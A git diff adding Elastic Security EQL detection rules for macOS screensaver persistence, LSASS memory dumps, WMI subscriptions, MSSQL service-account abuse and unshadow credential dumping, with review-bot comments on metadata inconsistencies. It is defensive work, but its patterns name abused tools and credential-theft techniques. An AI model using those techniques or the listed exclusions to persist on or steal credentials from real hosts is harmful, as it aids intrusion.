@@ -0,0 +1,102 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a screensaver plist file is modified by an unexpected process. An adversary can maintain persistence on a macOS endpoint by creating a malicious screensaver (.saver) file and configuring the screensaver plist file to execute code each time the screensaver is activated.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Screensaver Plist File Modified by Unexpected Process", + "note": "## Triage and analysis\n\n- Analyze the plist file modification event to identify whether the change was expected or not\n- Investigate the process that modified the plist file for malicious code or other suspicious behavior\n- Identify if any suspicious or known malicious screensaver (.saver) files were recently written to or modified on the host\n", + "query": "file where host.os.type == \"macos\" and event.type != \"deletion\" and\n file.name: \"com.apple.screensaver.*.plist\" and\n file.path : (\n \"/Users/*/Library/Preferences/ByHost/*\",\n \"/Library/Managed Preferences/*\",\n \"/System/Library/Preferences/*\"\n ) and\n (\n process.code_signature.trusted == false or\n process.code_signature.exists == false or\n\n /* common script interpreters and abused native macOS bins */\n process.name : (\n \"curl\",\n \"mktemp\",\n \"tail\",\n \"funzip\",\n \"python*\",\n \"osascript\",\n \"perl\"\n )\n ) and\n\n /* Filter OS processes modifying screensaver plist files */\n not process.executable : (\n \"/usr/sbin/cfprefsd\",\n \"/usr/libexec/xpcproxy\",\n \"/System/Library/CoreServices/ManagedClient.app/Contents/Resources/MCXCompositor\",\n \"/System/Library/CoreServices/ManagedClient.app/Contents/MacOS/ManagedClient\"\n )\n", + "references": [ + "https://posts.specterops.io/saving-your-access-d562bf5bf90b", + "https://github.com/D00MFist/PersistentJXA" + ], + "related_integrations": [ + { + "package": 
"endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.exists", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e6e8912f-283f-4d0d-8442-e0dcaf49944b", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. 
[Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "e6e8912f-283f-4d0d-8442-e0dcaf49944b_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e707a7be-cc52-41ac-8ab3-d34b38c20005_2.json b/packages/security_detection_engine/kibana/security_rule/e707a7be-cc52-41ac-8ab3-d34b38c20005_2.json new file mode 100644 index 00000000000..f27e2de916e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e707a7be-cc52-41ac-8ab3-d34b38c20005_2.json 
@@ -0,0 +1,105 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the creation or modification of a medium size memory dump file which can indicate an attempt to access credentials from a process memory.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Credential Access via Memory Dump File Creation", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n\n /* MDMP header */\n file.Ext.header_bytes : \"4d444d50*\" and file.size >= 30000 and\n not\n\n (\n (\n process.name : \"System\" or\n process.executable : (\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\Wermgr.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\Wermgr.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WUDFHost.exe\",\n \"C:\\\\Windows\\\\System32\\\\rdrleakdiag.exe\",\n \"?:\\\\Windows\\\\System32\\\\Taskmgr.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\Taskmgr.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\SystemApps\\\\*.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Zoom\\\\bin\\\\zCrashReport64.exe\"\n ) and process.code_signature.trusted == true\n ) or\n (\n file.path : (\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\WER\\\\*\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\WDF\\\\*\",\n \"?:\\\\ProgramData\\\\Alteryx\\\\ErrorLogs\\\\*\",\n \"?:\\\\ProgramData\\\\Goodix\\\\*\",\n \"?:\\\\Windows\\\\system32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Zoom\\\\logs\\\\zoomcrash*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\*\\\\Crashpad\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\*\\\\crashpaddb\\\\*\",\n 
\"?:\\\\Users\\\\*\\\\AppData\\\\*\\\\HungReports\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\*\\\\CrashDumps\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\*\\\\NativeCrashReporting\\\\*\"\n ) and (process.code_signature.trusted == true or process.executable == null)\n )\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "file.Ext.header_bytes", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.size", + "type": "long" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "e707a7be-cc52-41ac-8ab3-d34b38c20005", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "e707a7be-cc52-41ac-8ab3-d34b38c20005_2", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/e7125cea-9fe1-42a5-9a05-b0792cf86f5a_106.json b/packages/security_detection_engine/kibana/security_rule/e7125cea-9fe1-42a5-9a05-b0792cf86f5a_106.json new file mode 100644 index 00000000000..d6cc8fb0f2d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e7125cea-9fe1-42a5-9a05-b0792cf86f5a_106.json 
@@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies execution of suspicious persistent programs (scripts, rundll32, etc.) by looking at process lineage and command line usage.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Execution of Persistent Suspicious Program", + "query": "/* userinit followed by explorer followed by early child process of explorer (unlikely to be launched interactively) within 1m */\nsequence by host.id, user.name with maxspan=1m\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"userinit.exe\" and process.parent.name : \"winlogon.exe\"]\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"explorer.exe\"]\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"explorer.exe\" and\n /* add suspicious programs here */\n process.pe.original_file_name in (\"cscript.exe\",\n \"wscript.exe\",\n \"PowerShell.EXE\",\n \"MSHTA.EXE\",\n \"RUNDLL32.EXE\",\n \"REGSVR32.EXE\",\n \"RegAsm.exe\",\n \"MSBuild.exe\",\n \"InstallUtil.exe\") and\n /* add potential suspicious paths here */\n process.args : (\"C:\\\\Users\\\\*\", \"C:\\\\ProgramData\\\\*\", \"C:\\\\Windows\\\\Temp\\\\*\", \"C:\\\\Windows\\\\Tasks\\\\*\", \"C:\\\\PerfLogs\\\\*\", \"C:\\\\Intel\\\\*\")\n ]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": 
"process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e7125cea-9fe1-42a5-9a05-b0792cf86f5a", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.001", + "name": "Registry Run Keys / Startup Folder", + "reference": "https://attack.mitre.org/techniques/T1547/001/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 106 + }, + "id": "e7125cea-9fe1-42a5-9a05-b0792cf86f5a_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e7125cea-9fe1-42a5-9a05-b0792cf86f5a_107.json b/packages/security_detection_engine/kibana/security_rule/e7125cea-9fe1-42a5-9a05-b0792cf86f5a_107.json new file mode 100644 index 00000000000..247fca0aeb1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e7125cea-9fe1-42a5-9a05-b0792cf86f5a_107.json 
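Review bot: This rule sets no `timestamp_override`, unlike the other rules in this diff, which all carry `"timestamp_override": "event.ingested"`; the same applies to `e7125cea-9fe1-42a5-9a05-b0792cf86f5a_107.json`, which differs from this file only in its index pattern (`logs-endpoint.events.process-*` instead of `logs-endpoint.events.*`). With the lookback fixed at `now-9m` and the rule keyed on `@timestamp`, events that are ingested late presumably fall outside the window and the three-step sequence is silently missed; if the omission is deliberate because of how sequence rules order events, that should be stated in a rule note rather than left implicit.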
@@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies execution of suspicious persistent programs (scripts, rundll32, etc.) by looking at process lineage and command line usage.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Execution of Persistent Suspicious Program", + "query": "/* userinit followed by explorer followed by early child process of explorer (unlikely to be launched interactively) within 1m */\nsequence by host.id, user.name with maxspan=1m\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"userinit.exe\" and process.parent.name : \"winlogon.exe\"]\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"explorer.exe\"]\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"explorer.exe\" and\n /* add suspicious programs here */\n process.pe.original_file_name in (\"cscript.exe\",\n \"wscript.exe\",\n \"PowerShell.EXE\",\n \"MSHTA.EXE\",\n \"RUNDLL32.EXE\",\n \"REGSVR32.EXE\",\n \"RegAsm.exe\",\n \"MSBuild.exe\",\n \"InstallUtil.exe\") and\n /* add potential suspicious paths here */\n process.args : (\"C:\\\\Users\\\\*\", \"C:\\\\ProgramData\\\\*\", \"C:\\\\Windows\\\\Temp\\\\*\", \"C:\\\\Windows\\\\Tasks\\\\*\", \"C:\\\\PerfLogs\\\\*\", \"C:\\\\Intel\\\\*\")\n ]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + 
"name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e7125cea-9fe1-42a5-9a05-b0792cf86f5a", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.001", + "name": "Registry Run Keys / Startup Folder", + "reference": "https://attack.mitre.org/techniques/T1547/001/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 107 + }, + "id": "e7125cea-9fe1-42a5-9a05-b0792cf86f5a_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e72f87d0-a70e-4f8d-8443-a6407bc34643_106.json b/packages/security_detection_engine/kibana/security_rule/e72f87d0-a70e-4f8d-8443-a6407bc34643_106.json new file mode 100644 index 00000000000..4fe15a7e154 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e72f87d0-a70e-4f8d-8443-a6407bc34643_106.json 
@@ -0,0 +1,88 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "Detects the creation of a WMI Event Subscription. Attackers can abuse this mechanism for persistence or to elevate to SYSTEM privileges.",
+ "from": "now-9m",
+ "index": [
+ "winlogbeat-*",
+ "logs-windows.sysmon_operational-*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Suspicious WMI Event Subscription Created",
+ "query": "any where event.dataset == \"windows.sysmon_operational\" and event.code == \"21\" and\n winlog.event_data.Operation : \"Created\" and winlog.event_data.Consumer : (\"*subscription:CommandLineEventConsumer*\", \"*subscription:ActiveScriptEventConsumer*\")\n",
+ "references": [
+ "https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf",
+ "https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96"
+ ],
+ "related_integrations": [
+ {
+ "package": "windows",
+ "version": "^1.5.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.code",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "winlog.event_data.Consumer",
+ "type": "unknown"
+ },
+ {
+ "ecs": false,
+ "name": "winlog.event_data.Operation",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "e72f87d0-a70e-4f8d-8443-a6407bc34643",
+ "severity": "medium",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Persistence",
+ "Data Source: Sysmon"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0003",
+ "name": "Persistence",
+ "reference": "https://attack.mitre.org/tactics/TA0003/"
+ },
+ "technique": [
+ {
+ "id": "T1546",
+ "name": "Event Triggered Execution",
+ "reference": "https://attack.mitre.org/techniques/T1546/",
+ "subtechnique": [
+ {
+ "id": "T1546.003",
+ "name": "Windows Management Instrumentation Event Subscription",
+ "reference": "https://attack.mitre.org/techniques/T1546/003/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 106
+ },
+ "id": "e72f87d0-a70e-4f8d-8443-a6407bc34643_106",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/e74d645b-fec6-431e-bf93-ca64a538e0de_3.json b/packages/security_detection_engine/kibana/security_rule/e74d645b-fec6-431e-bf93-ca64a538e0de_3.json
new file mode 100644
index 00000000000..e4d757f4073
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/e74d645b-fec6-431e-bf93-ca64a538e0de_3.json
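Review bot: The `required_fields` metadata is internally inconsistent: `winlog.event_data.Operation` is declared `"type": "keyword"` while `winlog.event_data.Consumer`, which is equally `"ecs": false` and comes from the same Sysmon `event_data` object, is declared `"type": "unknown"`. Both fields are used in the query as keyword-style pattern matches, so the two entries should presumably agree; whichever is correct, the other should be aligned so downstream tooling that reads this metadata does not treat the fields differently.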
@@ -0,0 +1,130 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies unusual process executions using MSSQL Service accounts, which can indicate the exploitation/compromise of SQL instances. Attackers may exploit exposed MSSQL instances for initial access or lateral movement.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Process For MSSQL Service Accounts", + "query": "process where event.type == \"start\" and host.os.type == \"windows\" and\n user.name : (\n \"SQLSERVERAGENT\", \"SQLAGENT$*\",\n \"MSSQLSERVER\", \"MSSQL$*\",\n \"MSSQLServerOLAPService\",\n \"ReportServer*\", \"MsDtsServer150\",\n \"MSSQLFDLauncher*\",\n \"SQLServer2005SQLBrowserUser$*\",\n \"SQLWriter\", \"winmgmt\"\n ) and user.domain : \"NT SERVICE\" and\n not (\n (\n process.name : (\n \"sqlceip.exe\", \"sqlservr.exe\", \"sqlagent.exe\",\n \"msmdsrv.exe\", \"ReportingServicesService.exe\",\n \"MsDtsSrvr.exe\", \"sqlbrowser.exe\", \"DTExec.exe\",\n \"SQLPS.exe\", \"fdhost.exe\", \"fdlauncher.exe\",\n \"SqlDumper.exe\", \"sqlsqm.exe\", \"DatabaseMail.exe\"\n ) or\n process.executable : (\n \"?:\\\\Windows\\\\System32\\\\wermgr.exe\",\n \"?:\\\\Windows\\\\System32\\\\conhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\"\n )\n ) and\n (\n process.code_signature.subject_name : (\"Microsoft Corporation\", \"Microsoft Windows\") and\n process.code_signature.trusted == true\n )\n ) and\n not (\n process.name : \"cmd.exe\" and process.parent.name : \"sqlservr.exe\"\n )\n", + "references": [ + "https://www.microsoft.com/en-us/security/blog/2023/08/24/flax-typhoon-using-legitimate-software-to-quietly-access-taiwanese-organizations/", + "https://learn.microsoft.com/en-us/sql/database-engine/configure-windows/configure-windows-service-accounts-and-permissions?view=sql-server-ver16" + ], + "related_integrations": [ + { + "package": 
"endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "e74d645b-fec6-431e-bf93-ca64a538e0de", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1210", + "name": "Exploitation of Remote Services", + "reference": "https://attack.mitre.org/techniques/T1210/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1505", + "name": "Server Software Component", + "reference": "https://attack.mitre.org/techniques/T1505/", + "subtechnique": [ + { + "id": "T1505.001", + "name": "SQL Stored Procedures", + "reference": "https://attack.mitre.org/techniques/T1505/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "e74d645b-fec6-431e-bf93-ca64a538e0de_3", + "type": "security-rule" +} \ No newline 
at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_7.json b/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_7.json new file mode 100644 index 00000000000..6209226c5a7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_7.json 
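Review bot: The final exclusion `not (process.name : \"cmd.exe\" and process.parent.name : \"sqlservr.exe\")` removes precisely the child-shell pattern the description ties to compromised SQL instances, and nothing in the file says why; presumably a separate rule covers that case, but without an EQL comment such as `/* cmd.exe under sqlservr.exe is handled by a dedicated rule */` a future maintainer is likely to read it as a coverage gap or drop it. The `user.name` list also includes `\"winmgmt\"`, which is not obviously an MSSQL service account like the other entries; if it is intentional, the description or a query comment should say so.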
@@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of the unshadow utility which is part of John the Ripper, a password-cracking tool on the host machine. Malicious actors can use the utility to retrieve the combined contents of the '/etc/shadow' and '/etc/password' files. Using the combined file generated from the utility, the malicious threat actors can use them as input for password-cracking utilities or prepare themselves for future operations by gathering credential information of the victim.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Linux Credential Dumping via Unshadow", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and\nprocess.name == \"unshadow\" and process.args_count >= 3\n", + "references": [ + "https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e7cb3cfd-aaa3-4d7b-af18-23b89955062c", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.008", + "name": "/etc/passwd and /etc/shadow", + "reference": "https://attack.mitre.org/techniques/T1003/008/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "e7cb3cfd-aaa3-4d7b-af18-23b89955062c_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_8.json b/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_8.json new file mode 100644 index 00000000000..351d0229d9a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_8.json 
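Review bot: The description refers to `'/etc/password'`, but the file unshadow reads is `/etc/passwd`, as the subtechnique entry later in the same file names correctly; the sentence should read `'/etc/shadow' and '/etc/passwd'`. The identical description appears in `e7cb3cfd-aaa3-4d7b-af18-23b89955062c_8.json`. Both versions also link the agent-policy helper guide at `https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html`, whereas every other setup section in this diff uses `fleet/current/`, so the pinned link will go stale; this version additionally lacks the `## Setup` heading that `_8` adds and ends its setup string with a trailing `\n\n`.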
